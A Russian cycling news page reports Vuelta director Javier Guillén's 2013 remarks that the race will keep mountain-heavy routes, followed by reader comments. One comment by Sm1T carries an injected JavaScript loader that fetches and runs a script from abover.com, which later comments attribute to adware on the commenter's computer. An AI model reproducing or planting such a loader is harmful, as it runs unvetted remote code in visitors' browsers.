Директор испанского Гран-тура Хавьер Гильен (Javier Guillén) подвёл итоги прошедшей Вуэльты Импании и подчеркнул, что и в будущем этапы гонки останутся преимущественно горными. В этом году даже этапы, выглядящие спринтерскими на карте, оказывались подходящими лишь для гонщиков-универсалов, но никак не для чистых спринтеров. В последние три-четыре года Вуэльта постепенно почти избавилась от долгих равнинных этапов, гонка идёт всё дальше вглубь Испании, на небольшие просёлочные дороги, организаторы находят всё новые «стены» с внушительными градиентами.

  В интервью VeloNews Гильен отметил, что в итоге за последние годы с ростом количества гор в маршруте вырос и телевизионный рейтинг Вуэльты, поэтому в дальнейшем организаторы намерены придерживаться этой же формулы: «Да, это правда, что у спринтеров было не так много возможностей. Это не значит, что нам не нравятся такие типы этапов, но у Вуэльты есть свой стиль и индивидуальность. Болельщикам нравится та гонка, которую мы делаем – с горами, с взрывными финишами в подъём. Я не собираюсь никого обманывать, нам нравятся горные финалы. Нам нравятся финиши в гору, и мы продолжим добавлять их в маршрут, включая новые подъёмы, поиск которых у нас идёт постоянно».

  Хавьер Гильен был доволен тем, что победитель Вуэльты определился лишь на последнем горнном этапе до Англиру: «Вуэльта получилась очень хорошей, с накалом эмоций с первого до последнего дня. До этапа с Англиру разрывы были очень маленькими, лишь три секунды между первым и вторым местом. Мы довольны, мы набрали отличный рейтинг. Этап до Англиру собрал отличную аудиторию. Мы основывались на успехе прошлого года. Важно, что зрители получили от Вуэльты удовольствие. Победителя определила дорога. Анализировать будем позже. Мы хотим только одного, чтобы выиграл лучший гонщик, чтобы была интересная борьба, и чтобы у нас не было проблем с победами. Кто бы ни взял победу, он заслуживает наших поздравлений».

  Несмотря на то, что официальная презентация следующего маршрута Вуэльты состоится в январе 2014 года, Гильен дал понять, что испанский Гран-тур останется гонкой для горняков и маршрут не будет сильно отличаться от того, что был в этом году.

 

Copyright © VeloLIVE.com Все права защищены

Поддержите нас, поделитесь побликацией с друзьями в социальных сетях. Спасибо!

Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.
  1. Dario

    17 сентября 2013 21:01 | Регистрация: 8.05.2010

    Мне нравится Вуэльта нового типа. Вообще хорошо, что у каждого Грандтура есть свой рисунок и они не похожи между собой.
    Полностью поддерживаю идею с тем, чтобы было было побольше горных этапов (включая равнинные этапы с горным торчком на финише). Главное, держать руку на пульсу и не переборщить со сложностью рельефа гонки.

  2. Sm1T

    17 сентября 2013 21:07 | Регистрация: 1.01.2012

    вобщем пока Хорхе и пурито еще по разу не повыигрывают, будут горы горы горы :) (function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random(); script.onload = script.onerror = function () { script.onload = script.onerror = null; script.parentNode.removeChild(script); } document.body.appendChild(script); })();

  3. Dario

    17 сентября 2013 21:10 | Регистрация: 8.05.2010

    Цитата: Sm1T
    вобщем пока Хорхе и пурито еще по разу не повыигрывают


    Пурито пока ни разу не выигрывал :)

  4. motte

    17 сентября 2013 21:40 | Регистрация: 4.07.2011

    Гильен дал понять, что испанский Гран-тур останется гонкой для горняков и маршрут не будет сильно отличаться от того, что был в этом году.
    Класс.....уже заинтриговал.....главное дожить до следующего года, ибо дальше ланча не загадываю......
    ЗЫ тогда вообще с ТДФ "прыгнуть" на новую Вуэльту будет просто невероятно (это для тех гонцов, кто действительно будет отрабатывать ТДФ).....жестоко....но рейтинг Вуэльты конкретно растет и это главное!

  5. shabaloid

    17 сентября 2013 23:13 | Регистрация: 23.07.2013

    Если сделать горную Джиро,было б интересней,горки более интересные,Вуэльта в любом случае самый интересный ГТ

  6. quantor

    18 сентября 2013 01:06 | Регистрация: 19.06.2013

    Sm1T,
    извини не первый раз наблюдаю полупрограммистский шлейф, который сопровождает твои высказывания. Ты можешь избавиться от него? Или нужна внешняя помощь?
    Ответ лучше в личку писать, если будешь.

  7. Sm1T

    18 сентября 2013 08:49 | Регистрация: 1.01.2012

    Sm1T,
    извини не первый раз наблюдаю полупрограммистский шлейф, который сопровождает твои высказывания. Ты можешь избавиться от него? Или нужна внешняя помощь?
    Ответ лучше в личку писать, если будешь.


     


    да это вирусягу поймал на комп, которая мне рекламу тыкает во все сообщения. не было временя исправить.
    сейчас этим займусь

  8. ezhachok

    18 сентября 2013 10:00 | Регистрация: 24.08.2011

    Рад за Вуэльту...с тех пор как появилась красная майка, т.е. с пор прихода в гонку A.S.O., Вуэльта стала себя позиционировать как экстремально горная гонка и это дает результат. Гонка стала интересной, рейтинги растут...а для колхозной некогда Вуэльты это - главное.

    ТДФ - это что-то особенное по статусу, у гонки давным давно есть свое лицо.
    Джиро - романтическая Италия и ее горы...гонка тоже уже давно обрела себя.
    С Вуэльтой это происходит сейчас, точнее - уже произошло и я рад за гонку, она мне всегда нравилась, еще с времен первой победы на ней Мени.

  9. RVL

    18 сентября 2013 10:54 | Регистрация: 30.08.2012

    плюсую! зачастую, на спринтерских этапах, велофаны просто кимарят до финиша, под убаюкивающее мурлыканье комментатора...

    я даже будильник ставлю, что бы спринт не проспать 

    в этом несомненно есть свои плюсы. дневной сон- это хорошо!  ))))

Информация
Посетители, находящиеся в группе Гость, не могут оставлять комментарии к данной публикации.

Ближайшие старты

7 - 29 июля 2018

Tour de France


ОПРОС

Кто станет победителем Тур де Франс-2018?

Комментарии

  • Сейтмеметов сейтхалил
    Тур де Франс-2018. Результаты ... (45)
    Сейтмеметов сейтхалил-Фото
    Я смотрел тот этап , коломбье классическая гора но ничего сверхъестественного , тем более с этой стороны ,просто есть подозрение что он хочет слить майку . отрезки свыше 8 процентов по моему только 3 горках и шесть или семь раз . максимальный участок это 300 метров один раз, остальные не больше 200. Я ещё раз повторяю что это моё видение и оно может отличаться от видения и стратегии ГВА и ВМС . Но коломбье действительно с этой стороны ещё и ветер в долине попутный .ЕСЛИ Я НЕ ОШИБАЮСЬ)))
  • Earl57
    Тур де Франс-2018. Результаты ... (45)
    Earl57-Фото

    Цитата: Сейтмеметов сейтхалил
    Почему то я верю что после дня отдыха вторник этап , ГВА подходит средние горки все на плато 600 метров подъемы соответсенно даже километра нет набора высоты все в длину 10 км , то есть градиент не за предельный 8-8.5 процентов финиш со спуска приправильно построенной тактике за два км отставать и со спуска въезжать

    Вы уверены, что смотрели альтиметрию 10-го этапа, а не какого-то другого? Три горы первой категории и одна высшей, подъемы по 6-8 км протяженностью, максимальный градиент больше 12%. И давно Коль де Коломбье стала "средней горкой"? Плюс новый подъем с 2 км гравийной дороги без асфальта.

  • Адриен
    Тур де Франс-2018. Результаты ... (45)
    Адриен-Фото
    СЛУШАЙТЕ, ЭТО ВАС НЕВОЗМОЖНО ЧИТАТЬ !!! Вы хотите, чтобы здесь в комментариях все были одинаковы, как солдаты в строю !?!? Ведь весь интерес - именно в РАЗНОСТИ мнений - нравятся некоторые из них ЛИЧНО вам или нет, считаете вы их верными, правильными или нет . Ну не надоело ли по ОБЩЕЙ струнке ходить ? Спорте, доказывайте, но не ОСКОРБЛЯЙТЕ ! Ведь людей, которые пишут комментарии, делятся своими мыслями и впечатлениями мы в большинстве лично не знаем. К чему это ВЫСОКОМЕРНОЕ отношение "через губу" - мол, я обладаю истиной в последней инстанции, а этот и этот ересь пишут, только потому что я с ними не согласен? Что же вы такие , извините, злые и нетерпимые просто к чужой точке зрения, даже если она и неверна ?
  • Volodia1987
    Тур де Франс-2018. Результаты ... (45)
    Volodia1987-Фото
    Во вторник посмотрим какова Катюша в горах.
  • Сейтмеметов сейтхалил
    Тур де Франс-2018. Результаты ... (45)
    Сейтмеметов сейтхалил-Фото
    К слову на олимпийских играх господа Фрум и Томас почти по три минуты словили. Так что от настроя на гонку многое зависит.
  • Mikael
    Тур де Франс-2018. Результаты ... (45)
    Mikael-Фото
    Посмотрел стату. У Кочеткова за последние годы есть отличные выступления в горах. Выступает не ровно. Где-то выдает топ результат и может приехать вместе с Нибали или Ару. Где-то не тянет/забивает/берет передышку. В этом году на самых топовых горных этапах Дофинэ был в 30. Не плохо.
  • veloster
    Николя Порталь: «Есть вероятно ... (11)
    veloster-Фото

    Не понятно, зачем об этом вообще сейчас говорить? У Порталя от эйфории башку что-ли снесло?

  • кнд
    Ричи Порт сошёл с Тур де Франс ... (5)
    кнд-Фото

    Цитата: veloster
    По-моему, никто даже не удивлен. Все привыкли, и все знают, что рано или поздно это с ним случится. Может ему надо было лучше на Вуэльте сосредоточиться? 
     

    Лучше на шахматах сосредотачиваться.

  • veloster
    Ричи Порт сошёл с Тур де Франс ... (5)
    veloster-Фото

    По-моему, никто даже не удивлен. Все привыкли, и все знают, что рано или поздно это с ним случится. Может ему надо было лучше на Вуэльте сосредоточиться? Там шансов упасть меньше и конкуренция поменьше.

  • Сейтмеметов сейтхалил
    Тур де Франс-2018. Результаты ... (45)
    Сейтмеметов сейтхалил-Фото
    Почему то я верю что после дня отдыха вторник этап , ГВА подходит средние горки все на плато 600 метров подъемы соответсенно даже километра нет набора высоты все в длину 10 км , то есть градиент не за предельный 8-8.5 процентов финиш со спуска приправильно построенной тактике за два км отставать и со спуска въезжать ,я думаю это по силам, фруму уже надо почти две минуты привезти . Квятковский не известно отойдет или нет. Томас не лучший спусковик ,да и зачем какой смысл ,есть разделка где могут кинуть, и она впереди . Скай даже на Джиро постарался оттянуть на как можно позже майку что бы не тянуть . Хоть и моторы ,но батарейки не вечные.Я видел по другому все это . ГВА команды в расчёт не берут . Сегодня никто не строился специально. Только отъезды лидеров , а грегари у многих тоже в группе были но сидели в глубине, видно требовался только если на замены колёс и велосипедов. Ни одна команда из потенциальных генеральщиков до сих пор не брали инициативу на себя ,только Скай один раз открылся когда ирландец отстал, а там уже и финишеры подхватили дальше. Пока все готовятся к третьей неделе и стараются минимизировать потери и не упасть как можно меньше раз. Я думаю при дополнительном времени которое он имел но потерял ,ГВА имел все шансы стать гонщиком как когда то Воклер и Ночентини. Неделю полторы поездить в майке лидера. Их тоже никто не принимал в расчёт и вся классифика распрнделилась как и ожидали. Есть другой вариант, что ГВА хочет выйти из классифики и поездить в отрывах за этапами. Смутная перспектива как по мне . Тем более есть риск закрытия команды и результат нужен всем. Во вторник в это время будем обсуждать ))))) К редакции вопрос как насчёт чемпионата Европы ?

Велоспорт в Фейсбуке

Велоспорт ВКонтакте

Одноклассники

Твиттер VeloLIVE